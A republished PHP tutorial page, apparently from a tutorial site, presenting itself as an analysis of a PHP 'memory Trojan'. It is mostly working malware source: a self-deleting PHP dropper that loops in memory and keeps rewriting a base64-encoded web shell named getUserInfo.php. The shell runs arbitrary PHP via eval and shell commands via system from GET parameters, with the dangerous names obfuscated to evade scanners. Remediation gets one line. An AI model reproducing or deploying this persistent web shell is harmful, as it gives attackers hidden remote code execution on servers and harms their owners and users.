Home > Backend Development > PHP Tutorial > Take you to analyze the implementation principle of PHP memory Trojan virus

Take you to analyze the implementation principle of PHP memory Trojan virus

藏色散人
Release: 2023-04-11 08:14:01
forward
3644 people have browsed it

Preface

Memory Trojan is a Trojan virus that runs in the memory and has no code entity. Memory Trojans are highly concealed, difficult to detect, and unkillable (commonly known as immortal horses).

The network security industry has a strong barrel effect. The system fights against black hats, and the outcome depends on the weakest link in security. Black hat versus white hat, the outcome depends on the level of attack and the level of concealment and destruction.

The main text does not discuss whether an arbitrary file upload or a near-source attack made a piece of malicious code accessible to the production server.

Virus source code (very simple)

<?php
//设置脚本不超时
set_time_limit(0);ignore_user_abort(true);
//删除文件本体
@unlink(__FILE__);
//给木马病毒起一个迷惑性的名字
$file = &#39;./getUserInfo.php&#39;;
//死循环常驻内存。释放木马文件
while(true) {
 if(! file_exists($file)) @file_put_contents($file, base64_decode(&#39;PD9waHAKaWYoJGUgPSBAJF9HRVRbJ2UnXSkgewogICAgJGZ1bmMgPSBAY3JlYXRlX2Z1bmN0aW9uKG51bGwsIGJhc2U2NF9kZWNvZGUoJ1pYWmhiQ2dpJykgLiAkZSAuIGJhc2U2NF9kZWNvZGUoJ0lpazcnKSk7CiAgICAkZnVuYygpOwp9CgppZigkcyA9IEAkX0dFVFsncyddKSB7CiAgICAkZiA9IHN0cl9yZXBsYWNlKCd4JywgJycsICd4eHhzeHh5eHN4eHh4eHh0eHhleHh4bXh4eHh4eHh4Jyk7CiAgICAkZigkcyk7Cn0=&#39;));
 sleep(60);
}
Copy after login

Release the virus body

<?php
//以下代码实现了eval关键字和system函数的伪装
//eval($_GET[&#39;e&#39;]);
if($e = @$_GET[&#39;e&#39;]) {
    $func = @create_function(null, base64_decode(&#39;ZXZhbCgi&#39;) . $e . base64_decode(&#39;Iik7&#39;));
    $func();
}
//system($_GET[&#39;s&#39;]);
if($s = @$_GET[&#39;s&#39;]) {
    $f = str_replace(&#39;x&#39;, &#39;&#39;, &#39;xxxsxxyxsxxxxxxtxxexxxmxxxxxxxx&#39;);
    $f($s);
}
Copy after login

Instructions

  • The above key sensitive codes have been encoded to avoid various security scans.

  • Once the virus sample is run, it will delete itself and run in the memory for a long time.

  • Even if the released Trojan is detected and deleted, the same file will still be generated.

Solution

After killing the process, delete the released Trojan file.

Recommended: "PHP Video Tutorial"

The above is the detailed content of Take you to analyze the implementation principle of PHP memory Trojan virus. For more information, please follow other related articles on the PHP Chinese website!

Related labels:
php
source:learnku.com
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template